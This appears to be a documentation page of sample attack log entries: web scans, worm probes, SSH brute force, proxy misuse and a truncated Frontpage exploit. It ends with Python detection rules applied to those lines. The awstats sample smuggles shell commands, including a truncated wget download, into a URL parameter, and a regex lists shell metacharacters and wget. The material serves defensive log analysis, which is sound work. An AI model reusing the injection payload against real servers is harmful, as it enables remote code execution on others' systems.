Samples of logs that contain information about attacks
=======================================================
Nessus scan entries in a web server log:
----------------------------------------
Latest application scans:
-------------------------

Apache entry with command execution succeeded:
----------------------------------------------

.. code-block:: console

    a.b.c.d - - [13/Jan/2006:01:07:21 -0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget...;echo%20YYY;echo|HTTP/1.0" 404 291

Apache scan (looking for vulnerable applications):
--------------------------------------------------

.. code-block:: console

    100.149.117.1 - - [13/Jan/2006:01:03:30 -0200] "POST /blog/xmlrpc.php HTTP/1.0" 404 288
    100.149.117.1 - - [13/Jan/2006:01:03:31 -0200] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 295
    100.149.117.1 - - [13/Jan/2006:01:03:32 -0200] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 296
    100.149.117.1 - - [13/Jan/2006:01:03:33 -0200] "POST /drupal/xmlrpc.php HTTP/1.0" 404 290

Squid access log (worm scans):
------------------------------

.. code-block:: console

    524 192.168.2.204 TCP_MISS/404 590 GET http://www.ordendeslichts.de/intern/xxx3.php? - DIRECT/81.201.107.6 text/html
    3571 192.168.2.204 TCP_MISS/404 470 GET http://www.levada.ru/htmlarea/images/xxx3.php? - DIRECT/62.118.252.213
    1 192.168.2.204 TCP_NEGATIVE_HIT/404 487 GET http://ala-bg.net/444.php - NONE/- text/html
    1 192.168.2.204 TCP_NEGATIVE_HIT/404 396 GET http://www.connectesl.com/444.php - NONE/- text/html
    1 192.168.2.204 TCP_NEGATIVE_HIT/404 543 GET http://www.chilotitomarino.cl/444.php - NONE/- text/html
    0 192.168.2.204 TCP_NEGATIVE_HIT/404 543 GET http://www.chilotitomarino.cl/444.php - NONE/- text/html

Squid proxy misuse – Attempt to proxy SMTP over the proxy:
----------------------------------------------------------

.. code-block:: console

    0 192.168.2.135 TCP_DENIED/403 1382 CONNECT 65.54.245.104:25 - NONE/- text/html
    2 192.168.2.135 TCP_DENIED/403 1378 CONNECT 4.79.181.14:25 - NONE/- text/html
    0 192.168.2.135 TCP_DENIED/403 1390 GET http://www.ebay.com/ - NONE/- text/html
    0 59.59.106.40 TCP_DENIED/403 1380 CONNECT 203.84.195.1:25 - NONE/- text/html
    8 59.59.106.40 TCP_DENIED/403 1380 CONNECT 203.84.195.1:25 - NONE/- text/html

SSH bruteforce login:
---------------------

.. code-block:: console

    Oct 2 01:13:19 host sshd[19618]: Illegal user test from ::ffff:69.10.144.194
    Oct 2 01:13:19 host sshd[19618]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!
    Oct 2 01:13:20 host sshd[19620]: Illegal user test from ::ffff:69.10.144.194
    Oct 2 01:13:20 host sshd[19620]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!
    Oct 2 01:13:22 host sshd[19622]: Illegal user test from ::ffff:69.10.144.194
    Oct 2 01:13:22 host sshd[19622]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!
    Oct 2 01:13:23 host sshd[19624]: Illegal user tester from ::ffff:69.10.144.194
    Oct 2 01:13:23 host sshd[19624]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!

Attempt to exploit Frontpage with payload truncated:
----------------------------------------------------

.. code-block:: console

    74.74.126.250 - - [02/Aug/2007:15:53:46 -0400] "SEARCH /\x90................................................................
    [... remainder of the \x90 NOP sled omitted ...]
    \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 271
    74.74.126.250 - - [02/Aug/2007:15:54:17 -0400] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 406 288
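As an added example (not part of the OSSEC documentation or its rule set), the Python below runs the detection logic these samples suggest over the page's own log lines: a frequency rule for the sshd "Illegal user" brute force, a match on CONNECT requests to TCP/25 in the Squid log, a check for shell metacharacters in an Apache request URI (the awstats ``configdir=`` sample), and a count of distinct 404 paths per client for the xmlrpc.php scan. The regexes assume the field layout exactly as shown on this page (the Squid lines lack the usual leading timestamp field); thresholds are constructed values.

```python
import re
from collections import Counter

# Sample lines are copied from the log samples on this page (not constructed);
# the Squid lines, as on the page, start with the duration field, not a timestamp.
SSHD = """Oct 2 01:13:19 host sshd[19618]: Illegal user test from ::ffff:69.10.144.194
Oct 2 01:13:19 host sshd[19618]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!
Oct 2 01:13:20 host sshd[19620]: Illegal user test from ::ffff:69.10.144.194
Oct 2 01:13:22 host sshd[19622]: Illegal user test from ::ffff:69.10.144.194
Oct 2 01:13:23 host sshd[19624]: Illegal user tester from ::ffff:69.10.144.194""".splitlines()
SQUID = """0 192.168.2.135 TCP_DENIED/403 1382 CONNECT 65.54.245.104:25 - NONE/- text/html
2 192.168.2.135 TCP_DENIED/403 1378 CONNECT 4.79.181.14:25 - NONE/- text/html
0 192.168.2.135 TCP_DENIED/403 1390 GET http://www.ebay.com/ - NONE/- text/html
0 59.59.106.40 TCP_DENIED/403 1380 CONNECT 203.84.195.1:25 - NONE/- text/html""".splitlines()
APACHE = """a.b.c.d - - [13/Jan/2006:01:07:21 -0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget...;echo%20YYY;echo|HTTP/1.0" 404 291
100.149.117.1 - - [13/Jan/2006:01:03:30 -0200] "POST /blog/xmlrpc.php HTTP/1.0" 404 288
100.149.117.1 - - [13/Jan/2006:01:03:31 -0200] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 295
100.149.117.1 - - [13/Jan/2006:01:03:32 -0200] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 296
100.149.117.1 - - [13/Jan/2006:01:03:33 -0200] "POST /drupal/xmlrpc.php HTTP/1.0" 404 290""".splitlines()

ILLEGAL_USER = re.compile(r"sshd\[\d+\]: Illegal user (\S+) from (?:::ffff:)?(\S+)")
SQUID_RE = re.compile(r"^\d+ (\S+) (\S+) \d+ (\S+) (\S+)")          # duration client result bytes method url
APACHE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')  # client method uri status
SHELL_META = re.compile(r"[|;`]|%3b|%7c|\bwget\b", re.I)  # pipe/semicolon/backtick, raw or URL-encoded, or a downloader

def ssh_bruteforce(lines, threshold=3):
    """Source IPs with at least `threshold` 'Illegal user' events (a frequency rule; threshold is constructed)."""
    hits = Counter(m.group(2) for m in map(ILLEGAL_USER.search, lines) if m)
    return {ip: n for ip, n in hits.items() if n >= threshold}

def squid_smtp_relay(lines):
    """Clients that asked the proxy to CONNECT to TCP/25, as (client, target, squid result), denied or not."""
    return [(m.group(1), m.group(4), m.group(2)) for m in map(SQUID_RE.match, lines)
            if m and m.group(3) == "CONNECT" and m.group(4).endswith(":25")]

def apache_command_injection(lines):
    """Requests whose URI carries shell metacharacters, e.g. the awstats configdir= sample."""
    return [(m.group(1), m.group(3)) for m in map(APACHE_RE.match, lines)
            if m and SHELL_META.search(m.group(3))]

def apache_404_scan(lines, threshold=3):
    """Clients collecting 404s on at least `threshold` distinct paths: an application scan."""
    paths = {}
    for m in filter(None, map(APACHE_RE.match, lines)):
        if m.group(4) == "404":
            paths.setdefault(m.group(1), set()).add(m.group(3))
    return {ip: len(p) for ip, p in paths.items() if len(p) >= threshold}
```

Note that the awstats request is detected on the URI alone, independent of its 404 status: a scanner's probe and a successful injection look the same in the access log, so the response code should not gate the alert.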